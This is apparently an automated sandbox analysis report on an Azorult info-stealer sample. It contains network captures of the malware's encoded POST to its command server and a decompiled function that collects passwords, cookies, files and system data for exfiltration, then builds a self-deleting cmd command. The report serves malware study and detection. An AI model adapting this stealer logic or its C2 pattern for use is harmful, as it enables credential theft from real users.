Sep 28, 2021 00:50:01.960875988 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:01.986246109 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:02.680742979 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:02.702230930 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:02.824556112 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:02.860742092 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:03.319825888 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:03.340208054 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:04.165034056 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:04.202244997 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:05.208450079 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:05.228010893 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:05.770684958 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:05.790070057 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:07.334913015 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:07.353903055 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:07.428095102 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:07.450180054 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:07.740792990 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:07.759613991 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:08.511379957 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:08.531145096 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:17.272458076 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:17.290194988 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:20.041127920 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:20.062921047 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:35.589652061 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:35.610187054 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:45.434261084 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:45.464673996 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:47.098167896 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:47.127352953 CEST	53	53777	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:01.078258038 CEST	57106	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:01.116170883 CEST	53	57106	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:09.692076921 CEST	60352	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:09.719302893 CEST	53	60352	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:21.565736055 CEST	56773	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:21.585149050 CEST	53	56773	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:21.925509930 CEST	60982	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:21.944746017 CEST	53	60982	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:22.043229103 CEST	58058	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:22.062781096 CEST	53	58058	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:29.277057886 CEST	64367	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:29.298317909 CEST	53	64367	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:42.556973934 CEST	51539	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:42.585114956 CEST	53	51539	8.8.8.8	192.168.2.3
Sep 28, 2021 00:51:58.267992020 CEST	55393	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:51:58.295708895 CEST	53	55393	8.8.8.8	192.168.2.3
Sep 28, 2021 00:52:09.014669895 CEST	50585	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:52:09.045800924 CEST	53	50585	8.8.8.8	192.168.2.3
Sep 28, 2021 00:52:37.089941025 CEST	63456	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:52:37.110119104 CEST	53	63456	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 00:51:21.565736055 CEST	192.168.2.3	8.8.8.8	0xfa02	Standard query (0)	admin.svapofit.com	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:21.925509930 CEST	192.168.2.3	8.8.8.8	0x442	Standard query (0)	survey-smiles.com	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:22.043229103 CEST	192.168.2.3	8.8.8.8	0x1066	Standard query (0)	ww1.survey-smiles.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 00:51:21.585149050 CEST	8.8.8.8	192.168.2.3	0xfa02	No error (0)	admin.svapofit.com		63.141.242.43	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:21.944746017 CEST	8.8.8.8	192.168.2.3	0x442	No error (0)	survey-smiles.com		5.79.68.108	A (IP address)	IN (0x0001)
Sep 28, 2021 00:51:22.062781096 CEST	8.8.8.8	192.168.2.3	0x1066	No error (0)	ww1.survey-smiles.com	12065.BODIS.com		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 00:51:22.062781096 CEST	8.8.8.8	192.168.2.3	0x1066	No error (0)	12065.BODIS.com		199.59.242.153	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

admin.svapofit.com

survey-smiles.com

ww1.survey-smiles.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49862	63.141.242.43	80	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 00:51:21.739099979 CEST	5919	OUT	POST /azs/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: admin.svapofit.com Content-Length: 101 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Sep 28, 2021 00:51:21.887695074 CEST	5919	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 27 Sep 2021 22:51:21 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=6f600628-1fe5-11ec-b80c-ddc39747a61b; path=/; domain=.svapofit.com; expires=Sun, 16 Oct 2089 02:05:28 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49863	5.79.68.108	80	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 00:51:21.973798990 CEST	5920	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Host: survey-smiles.com Connection: Keep-Alive
Sep 28, 2021 00:51:22.030646086 CEST	5920	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 27 Sep 2021 22:51:21 GMT location: http://ww1.survey-smiles.com server: nginx set-cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176; path=/; domain=.survey-smiles.com; expires=Sun, 16 Oct 2089 02:05:29 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49864	199.59.242.153	80	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 00:51:22.166258097 CEST	5921	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Cache-Control: no-cache Connection: Keep-Alive Host: ww1.survey-smiles.com Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
Sep 28, 2021 00:51:22.269495964 CEST	5923	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 27 Sep 2021 22:51:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: parking_session=61c87920-28c6-e4e4-9f03-a9e204fef8f0; expires=Mon, 27-Sep-2021 23:06:22 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_eNF+XNh9GvjZqNm1u+MIZixMaMS0o4XDi5dH/YZma3b0y3KrdCRlULNNeeHOHQxvscZOqg9dOcBGbSbu4ivBKw== Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 35 35 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 4e 46 2b 58 4e 68 39 47 76 6a 5a 71 4e 6d 31 75 2b 4d 49 5a 69 78 4d 61 4d 53 30 6f 34 58 44 69 35 64 48 2f 59 5a 6d 61 33 62 30 79 33 4b 72 64 43 52 6c 55 4c 4e 4e 65 65 48 4f 48 51 78 76 73 63 5a 4f 71 67 39 64 4f 63 42 47 62 53 62 75 34 69 76 42 4b 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 Data Ascii: 559<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_eNF+XNh9GvjZqNm1u+MIZixMaMS0o4XDi5dH/YZma3b0y3KrdCRlULNNeeHOHQxvscZOqg9dOcBGbSbu4ivBKw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com"
Sep 28, 2021 00:51:22.269531965 CEST	5924	IN	Data Raw: 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e Data Ascii: crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNjFjODc5MjAtMjhjNi1lNGU0LTlmMDMtYTllMjA0ZmVmOGYwIiwicGFnZV90aW1lIjoxNjMyNzgzMDgyLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3MS5zdXJ2ZXktc21pbGVzLmNvbVwvI
Sep 28, 2021 00:51:22.269548893 CEST	5924	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe PID: 7040 Parent PID: 6404

General

Start time:	00:49:18
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe'
Imagebase:	0x400000
File size:	208384 bytes
MD5 hash:	73BD76F0549CC1992D943DDFD92A9C4D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: kevoreilly Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: kevoreilly
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe PID: 7040 Parent PID: 6404 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exeCOMMON

Executed Functions

Function 004186C4, Relevance: 102.6, APIs: 4, Strings: 54, Instructions: 1056
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004186C4(char __eax, void* __ebx, void* __edi, signed int __esi, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				void* _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v92;
				char* _v96;
				char _v100;
				char _v104;
				char* _v108;
				void* _v112;
				char _v241;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				void* _t444;
				void* _t450;
				intOrPtr* _t451;
				intOrPtr* _t616;
				intOrPtr* _t623;
				intOrPtr* _t630;
				intOrPtr* _t637;
				intOrPtr* _t651;
				intOrPtr* _t652;
				intOrPtr* _t653;
				intOrPtr* _t656;
				intOrPtr* _t657;
				intOrPtr* _t660;
				intOrPtr* _t661;
				intOrPtr* _t664;
				intOrPtr* _t672;
				void* _t678;
				intOrPtr* _t715;
				intOrPtr* _t751;
				intOrPtr* _t752;
				intOrPtr _t757;
				signed int _t807;
				intOrPtr* _t828;
				intOrPtr* _t831;
				signed int _t838;
				signed int _t885;
				intOrPtr _t902;
				int _t921;
				void* _t934;
				void* _t936;
				void* _t938;
				intOrPtr* _t945;
				intOrPtr* _t948;
				intOrPtr* _t949;
				intOrPtr* _t950;
				signed int _t963;
				signed int _t964;
				void* _t965;
				void* _t989;
				intOrPtr _t997;
				intOrPtr _t1015;
				intOrPtr* _t1088;
				void* _t1109;
				intOrPtr* _t1111;
				intOrPtr* _t1113;
				intOrPtr* _t1115;
				char** _t1118;
				void* _t1125;
				void* _t1153;
				void* _t1155;
				void* _t1156;
				intOrPtr _t1160;
				intOrPtr _t1161;
				void* _t1164;
				void* _t1191;
				void* _t1197;
				void* _t1205;
				void* _t1207;

				_t1207 = __fp0;
				_t1157 = __esi;
				_t1151 = __edi;
				_t962 = __ebx;
				_t1160 = _t1161;
				_t965 = 0x50;
				do {
					_push(0);
					_push(0);
					_t965 = _t965 - 1;
					_t1162 = _t965;
				} while (_t965 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1160);
				_push(0x41985e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1161;
				E004034E4( &_v76);
				_v86 = 0;
				_v85 = 0;
				E0040357C( &_v92, 0x41987c);
				E00405668();
				E00407DE0( &_v308, _t1162);
				_push( &_v308);
				E00406CE8( &_v312, __ebx, __esi); // executed
				_pop(_t444);
				E00403798(_t444, _v312);
				_t450 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v112 = _t450;
				_t451 =  *0x41b12c; // 0x41c6a4
				if( *((intOrPtr*)( *_t451))() == 0xb7) {
					L71:
					_pop(_t997);
					 *[fs:eax] = _t997;
					_push(E00419868);
					E004034E4( &_v644);
					E00403BF4( &_v640, 2);
					E004034E4( &_v632);
					E00403BF4( &_v628, 5);
					E00403508( &_v608, 9);
					E00403BDC( &_v572);
					E00403508( &_v568, 2);
					E00403BDC( &_v560);
					E00403508( &_v556, 2);
					E00403BDC( &_v548);
					E00403508( &_v544, 2);
					E00403BDC( &_v536);
					E00403508( &_v532, 2);
					E00403BDC( &_v524);
					E00403508( &_v520, 2);
					E00403BDC( &_v512);
					E00403508( &_v508, 2);
					E00403BDC( &_v500);
					E00403508( &_v496, 2);
					E00403BDC( &_v488);
					E00403508( &_v484, 0xa);
					E00403BF4( &_v444, 2);
					E004034E4( &_v436);
					E00403BF4( &_v432, 3);
					E004034E4( &_v420);
					E00403BF4( &_v416, 2);
					E004034E4( &_v408);
					E00403BF4( &_v404, 8);
					E004034E4( &_v372);
					E00403BF4( &_v368, 4);
					E00403508( &_v352, 0xc);
					E004034E4( &_v68);
					_t1015 =  *0x405f50; // 0x405f54
					E00404280( &_v64, 5, _t1015);
					E00403508( &_v44, 8);
					E004034E4( &_v8);
					E00403508( &_v108, 5);
					return E00403508( &_v84, 3);
				}
				E0040357C( &_v16, 0x419888);
				E00416DD4( &_v16, __ebx, 0x80000, 0x419928, __edi, __esi);
				E004069A8(_v16, _t962,  &_v316, __edi, _t1157);
				E0040357C( &_v16, _v316);
				E00406CE8( &_v324, _t962, _t1157); // executed
				E00406834(_v324, _t962, 0x80000,  &_v320, _t1151, _t1157);
				E004037DC( &_v36, _v320, 0x419934);
				E00416DD4( &_v36, _t962, 0x80000, _v92, _t1151, _t1157);
				E00417D84(_v16, _t962, _v36, _t1151, _t1157,  &_v20); // executed
				E00416DD4( &_v20, _t962, 0x80000, _v92, _t1151, _t1157);
				_t1164 = E00403790(_v20) - 0x2710;
				if(_t1164 < 0) {
					goto L71;
				}
				E004038DC(_v20, 0x419940);
				if(_t1164 == 0) {
					goto L71;
				}
				E004074E8(0x419960, _t962, 0x419950, _v20, _t1157,  &_v328);
				E004069A8(_v328, _t962,  &_v40, _t1151, _t1157);
				E004074E8(0x41997c, _t962, 0x41996c, _v20, _t1157,  &_v332);
				E00406B08(_v332, _t962,  &_v44, _t1151, _t1157);
				E00407A18(0x419988,  &_v48, _v40, _t1164);
				_t977 = 0x419994;
				E004074E8(0x4199a4, _t962, 0x419994, _v20, _t1157,  &_v340);
				_t1035 =  &_v336;
				E004069A8(_v340, _t962,  &_v336, _t1151, _t1157);
				E00408180(_v336, _t1164);
				E00409668(_v44, _t962, _t1157, _t1164);
				E0040E630();
				_t1153 = E00404648(_v48) - 1;
				if(_t1153 < 0) {
					L51:
					_t238 =  &_v8; // 0x2b
					_push( *_t238);
					_push(0x419988);
					E0041698C( &_v460, _t962, _t1035, _t1153, _t1157);
					_push(_v460);
					E00403850();
					E0040E6D4(_v456, _t962, "System.txt", _t1153, _t1157);
					E00406CE8( &_v468, _t962, _t1157);
					E00406834(_v468, _t962, _t977,  &_v464, _t1153, _t1157);
					_push(_v464);
					_push(0x419ec0);
					E00407B08( &_v476, _t962, _t1153, _t1157);
					E00406834(_v476, _t962, _t977,  &_v472, _t1153, _t1157);
					_push(_v472);
					_push(0x419ec0);
					E00406BD8( &_v488);
					E0040377C( &_v484, _v488);
					E00406834(_v484, _t962, _t977,  &_v480, _t1153, _t1157);
					_push(_v480);
					_push(0x419ec0);
					E004066E4( &_v500, _t1192);
					E0040377C( &_v496, _v500);
					E00406834(_v496, _t962, _t977,  &_v492, _t1153, _t1157);
					_push(_v492);
					_push(0x419ec0);
					E00406634( &_v512);
					E0040377C( &_v508, _v512);
					E00406834(_v508, _t962, _t977,  &_v504, _t1153, _t1157);
					_push(_v504);
					_push(0x419ec0);
					E004065F0( &_v524);
					E0040377C( &_v520, _v524);
					E00406834(_v520, _t962, _t977,  &_v516, _t1153, _t1157);
					_push(_v516);
					_push(0x419ec0);
					_t616 =  *0x41b2a8; // 0x41b0b8
					E0040709C( *_t616, _t962,  &_v536, _t1157, _t1192);
					E0040377C( &_v532, _v536);
					E00406834(_v532, _t962, _t977,  &_v528, _t1153, _t1157);
					_push(_v528);
					_push(0x419ec0);
					_t623 =  *0x41b2c4; // 0x41b0b0
					E0040709C( *_t623, _t962,  &_v548, _t1157, _t1192);
					E0040377C( &_v544, _v548);
					E00406834(_v544, _t962, _t977,  &_v540, _t1153, _t1157);
					_push(_v540);
					_push(0x419ec0);
					_t630 =  *0x41b1cc; // 0x41b0b4
					E0040709C( *_t630, _t962,  &_v560, _t1157, _t1192);
					E0040377C( &_v556, _v560);
					E00406834(_v556, _t962, _t977,  &_v552, _t1153, _t1157);
					_push(_v552);
					_push(0x419ec0);
					_t637 =  *0x41b3f8; // 0x41b0ac
					E0040709C( *_t637, _t962,  &_v572, _t1157, _t1192);
					E0040377C( &_v568, _v572);
					E00406834(_v568, _t962, _t977,  &_v564, _t1153, _t1157);
					_push(_v564);
					_push(0x419ec0);
					E00406834(_v8, _t962, _t977,  &_v576, _t1153, _t1157);
					_push(_v576);
					_push(0x419ec0);
					E00407DE0( &_v584, _t1192);
					E00406834(_v584, _t962, _t977,  &_v580, _t1153, _t1157);
					_push(_v580);
					E00403850();
					_push("<info");
					_t651 =  *0x41b350; // 0x41b0bc
					_push( *_t651);
					_push(0x419edc);
					_push(_v28);
					_push("</info");
					_t652 =  *0x41b350; // 0x41b0bc
					_push( *_t652);
					_push(0x419edc);
					_push(0x419988);
					_push("<pwds");
					_t653 =  *0x41b350; // 0x41b0bc
					_push( *_t653);
					_push(0x419edc);
					E004063C8( &_v588, _t962, _t1153, _t1157);
					_push(_v588);
					_push("</pwds");
					_t656 =  *0x41b350; // 0x41b0bc
					_push( *_t656);
					_push(0x419edc);
					_push(0x419988);
					_push("<coks");
					_t657 =  *0x41b350; // 0x41b0bc
					_push( *_t657);
					_push(0x419edc);
					E00406560( &_v592, _t962, _t977, _t1153, _t1157);
					_push(_v592);
					_push("</coks");
					_t660 =  *0x41b350; // 0x41b0bc
					_push( *_t660);
					_push(0x419edc);
					_push(0x419988);
					_push("<file");
					_t661 =  *0x41b350; // 0x41b0bc
					_push( *_t661);
					_push(0x419edc);
					E0040E8D0( &_v596, _t962, _t1192);
					_push(_v596);
					_push("</file");
					_t664 =  *0x41b350; // 0x41b0bc
					_push( *_t664);
					_push(0x419edc);
					_push(0x419988);
					E00403850();
					_t1193 = _v85 - 1;
					if(_v85 == 1) {
						_push(_v24);
						_push("<ip");
						_t751 =  *0x41b350; // 0x41b0bc
						_push( *_t751);
						_push(0x419edc);
						_push(_v80);
						_push(0x419e90);
						_push(_v84);
						_push("</ip");
						_t752 =  *0x41b350; // 0x41b0bc
						_push( *_t752);
						_push(0x419edc);
						_push(0x419988);
						E00403850();
					}
					E00416DD4( &_v24, _t962, 0x80000, _v92, _t1153, _t1157);
					_t979 = 0;
					E00417D84(_v16, _t962, _v24, _t1153, _t1157,  &_v600);
					_t672 =  *0x41b3a0; // 0x41c6a0
					 *((intOrPtr*)( *_t672))(_v112);
					E00405114(0x419f74, _t962, _t1153, _t1157, _t1193);
					_t678 = E00403790(_v76);
					_t1194 = _t678 - 3;
					if(_t678 <= 3) {
						L65:
						E004099C0(_t962, _t1157);
						E00407DE0( &_v608, _t1205);
						E004038DC(_v608, 0x419fa4);
						if(_t1205 != 0) {
							L68:
							E004038DC(_v8, 0x419fb0);
							if(__eflags == 0) {
								__eflags = _v86 - 1;
								if(_v86 == 1) {
									E004028E0( &_v304, 0x3c);
									_v304 = 0x3c;
									_v300 = 0x1c0;
									_v296 = 0;
									_v292 = 0;
									E004062FC(L"%comspec%",  &_v612, __eflags);
									_v288 = E00403D98(_v612);
									E004062FC(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v620, __eflags);
									E00402754(0,  &_v632);
									E00403D88( &_v628, _v632);
									E004077C8(_v628, _t962, 0,  &_v624, _t1157, __eflags);
									E00403E78();
									_v284 = E00403D98(_v616);
									E00402754(0,  &_v644);
									E00403D88( &_v640, _v644);
